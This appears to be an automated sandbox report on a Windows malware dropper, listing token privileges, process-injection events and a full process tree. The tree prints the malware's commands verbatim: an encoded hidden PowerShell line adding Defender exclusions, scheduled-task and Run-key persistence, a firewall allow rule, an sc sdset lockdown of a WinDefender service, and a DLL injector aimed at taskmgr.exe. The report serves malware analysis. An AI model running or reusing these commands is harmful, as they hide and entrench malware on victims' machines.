Token: SeImpersonatePrivilege	4536	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Token: SeDebugPrivilege	4152	powershell.exe
Token: SeDebugPrivilege	3460	crazyCore.exe
Token: SeDebugPrivilege	4840	powershell.exe
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeDebugPrivilege	4780	powershell.exe
Token: SeDebugPrivilege	3788	powershell.exe
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeSystemEnvironmentPrivilege	1500	csrss.exe
Token: SeDebugPrivilege	1444	new.exe
Token: SeSecurityPrivilege	4780	sc.exe
Token: SeSecurityPrivilege	4780	sc.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	2432	net.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	200	ghjk.exe
Token: SeDebugPrivilege	2432	net.exe
Token: SeDebugPrivilege	4600	BLHisbnd.exe
Token: SeDebugPrivilege	5828	RegSvcs.exe
Token: SeDebugPrivilege	5188	dialer.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe
Token: SeManageVolumePrivilege	2740	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe
Token: SeManageVolumePrivilege	2740	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4268	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3584 wrote to memory of 1444	3584	4363463463464363463463463.exe	82
PID 3584 wrote to memory of 1444	3584	4363463463464363463463463.exe	82
PID 3584 wrote to memory of 1444	3584	4363463463464363463463463.exe	82
PID 3584 wrote to memory of 1660	3584	4363463463464363463463463.exe	84
PID 3584 wrote to memory of 1660	3584	4363463463464363463463463.exe	84
PID 3584 wrote to memory of 1660	3584	4363463463464363463463463.exe	84
PID 3584 wrote to memory of 1900	3584	4363463463464363463463463.exe	86
PID 3584 wrote to memory of 1900	3584	4363463463464363463463463.exe	86
PID 3584 wrote to memory of 1900	3584	4363463463464363463463463.exe	86
PID 3584 wrote to memory of 3884	3584	4363463463464363463463463.exe	87
PID 3584 wrote to memory of 3884	3584	4363463463464363463463463.exe	87
PID 3584 wrote to memory of 3884	3584	4363463463464363463463463.exe	87
PID 3584 wrote to memory of 4120	3584	4363463463464363463463463.exe	88
PID 3584 wrote to memory of 4120	3584	4363463463464363463463463.exe	88
PID 3584 wrote to memory of 4120	3584	4363463463464363463463463.exe	88
PID 4120 wrote to memory of 4516	4120	socks5-clean.exe	89
PID 4120 wrote to memory of 4516	4120	socks5-clean.exe	89
PID 4120 wrote to memory of 4516	4120	socks5-clean.exe	89
PID 3584 wrote to memory of 3032	3584	4363463463464363463463463.exe	91
PID 3584 wrote to memory of 3032	3584	4363463463464363463463463.exe	91
PID 3584 wrote to memory of 4868	3584	4363463463464363463463463.exe	92
PID 3584 wrote to memory of 4868	3584	4363463463464363463463463.exe	92
PID 4868 wrote to memory of 5092	4868	1bz7KfahvU.exe	93
PID 4868 wrote to memory of 5092	4868	1bz7KfahvU.exe	93
PID 5092 wrote to memory of 996	5092	powershell.exe	95
PID 5092 wrote to memory of 996	5092	powershell.exe	95
PID 4868 wrote to memory of 4716	4868	1bz7KfahvU.exe	96
PID 4868 wrote to memory of 4716	4868	1bz7KfahvU.exe	96
PID 4716 wrote to memory of 4388	4716	powershell.exe	98
PID 4716 wrote to memory of 4388	4716	powershell.exe	98
PID 4868 wrote to memory of 1464	4868	1bz7KfahvU.exe	99
PID 4868 wrote to memory of 1464	4868	1bz7KfahvU.exe	99
PID 1464 wrote to memory of 3576	1464	powershell.exe	101
PID 1464 wrote to memory of 3576	1464	powershell.exe	101
PID 3584 wrote to memory of 4536	3584	4363463463464363463463463.exe	102
PID 3584 wrote to memory of 4536	3584	4363463463464363463463463.exe	102
PID 3584 wrote to memory of 4536	3584	4363463463464363463463463.exe	102
PID 3584 wrote to memory of 4616	3584	4363463463464363463463463.exe	103
PID 3584 wrote to memory of 4616	3584	4363463463464363463463463.exe	103
PID 3884 wrote to memory of 2608	3884	hv.exe	105
PID 3884 wrote to memory of 2608	3884	hv.exe	105
PID 3884 wrote to memory of 2608	3884	hv.exe	105
PID 3884 wrote to memory of 2608	3884	hv.exe	105
PID 3884 wrote to memory of 2608	3884	hv.exe	105
PID 3884 wrote to memory of 2608	3884	hv.exe	105
PID 3884 wrote to memory of 2608	3884	hv.exe	105
PID 3884 wrote to memory of 2608	3884	hv.exe	105
PID 3884 wrote to memory of 4036	3884	hv.exe	106
PID 3884 wrote to memory of 4036	3884	hv.exe	106
PID 3884 wrote to memory of 4036	3884	hv.exe	106
PID 4616 wrote to memory of 2252	4616	SvCpJuhbT.exe	108
PID 4616 wrote to memory of 2252	4616	SvCpJuhbT.exe	108
PID 4616 wrote to memory of 2252	4616	SvCpJuhbT.exe	108
PID 4616 wrote to memory of 2252	4616	SvCpJuhbT.exe	108
PID 4616 wrote to memory of 2252	4616	SvCpJuhbT.exe	108
PID 2252 wrote to memory of 1100	2252	notepad.exe	109
PID 2252 wrote to memory of 1100	2252	notepad.exe	109
PID 2252 wrote to memory of 1100	2252	notepad.exe	109
PID 2252 wrote to memory of 1100	2252	notepad.exe	109
PID 2252 wrote to memory of 1100	2252	notepad.exe	109
PID 2252 wrote to memory of 1100	2252	notepad.exe	109
PID 2252 wrote to memory of 1100	2252	notepad.exe	109
PID 2252 wrote to memory of 1100	2252	notepad.exe	109
PID 4536 wrote to memory of 1908	4536	d21cbe21e38b385a41a68c5e6dd32f4c.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:464

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1164
- C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
  C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
  2⤵
  - Executes dropped EXE
  PID:4712
- C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
  C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
  2⤵
  - Executes dropped EXE
  PID:4660
- C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
  C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
  2⤵
  - Executes dropped EXE
  PID:1596
- C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
  2⤵
  - Executes dropped EXE
  PID:2756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVABhAGcAcwAuAGUAeABlADsA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:7032
- C:\Users\Admin\AppData\Local\Remaining\mveqdn\Tags.exe
  C:\Users\Admin\AppData\Local\Remaining\mveqdn\Tags.exe
  2⤵
  PID:3748
- C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  2⤵
  PID:7992
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 488
    3⤵
    - Program crash
    PID:5996
- C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  2⤵
  PID:9028
- C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  2⤵
  PID:5224
- C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  2⤵
  PID:7664
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7664 -s 484
    3⤵
    - Program crash
    PID:7428
- C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  2⤵
  PID:1172
- C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  2⤵
  PID:4944
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 480
    3⤵
    - Program crash
    PID:2328
- C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  2⤵
  PID:6880
- C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  2⤵
  PID:7636
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 372
    3⤵
    - Program crash
    PID:8384
- C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  2⤵
  PID:2688
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2688 -s 488
    3⤵
    - Program crash
    PID:892
- C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  2⤵
  PID:764
- C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  2⤵
  PID:8604
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:8012
- C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  2⤵
  PID:4952
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 480
    3⤵
    - Program crash
    PID:5048
- C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  2⤵
  PID:7768
- C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  2⤵
  PID:6472
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 480
    3⤵
    PID:700
- C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  C:\Users\Admin\AppData\Local\Temp\Files\NewB.exe
  2⤵
  PID:1836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1400
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2908
- - C:\Windows\SysWOW64\dialer.exe
    "C:\Windows\system32\dialer.exe"
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\dialer.exe
    "C:\Windows\system32\dialer.exe"
    3⤵
    PID:6900
- - C:\Windows\SysWOW64\dialer.exe
    "C:\Windows\system32\dialer.exe"
    3⤵
    PID:5020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1940

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1668

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2180

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2312

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2628

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3016

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3164

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3264
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1876
- - C:\Users\Admin\AppData\Local\Temp\Files\svcyr.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\svcyr.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:1444
- - C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:1660
- - C:\Users\Admin\AppData\Local\Temp\Files\svcyr.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\svcyr.exe"
    3⤵
    - Executes dropped EXE
    PID:1900
- - C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3884
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2608
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Remove-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists';New-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists' -Value '"C:\Users\Admin\AppData\Local\LibraryApp_for_translators_and_linguists\LibraryApp_for_translators_and_linguists.exe"' -PropertyType 'String'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4036
- - C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4120
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass -File socks5-clean.ps1
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4516
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4648
- - C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Launches sc.exe
    PID:3032
- - C:\Users\Admin\AppData\Local\Temp\Files\1bz7KfahvU.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\1bz7KfahvU.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:4868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5092
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
        5⤵
        Creates scheduled task(s)
        
        PID:996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4716
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
        5⤵
        Creates scheduled task(s)
        
        PID:4388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1464
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
        5⤵
        Creates scheduled task(s)
        
        PID:3576
- - C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4536
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1908
  - - C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:2648
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4152
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:4904
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:2924
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4840
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2068
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1500
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4780
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:1008
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:5012
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3788
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4860
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:916
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3184
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2132
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:2344
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:1660
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:4780
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2368
      - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
        
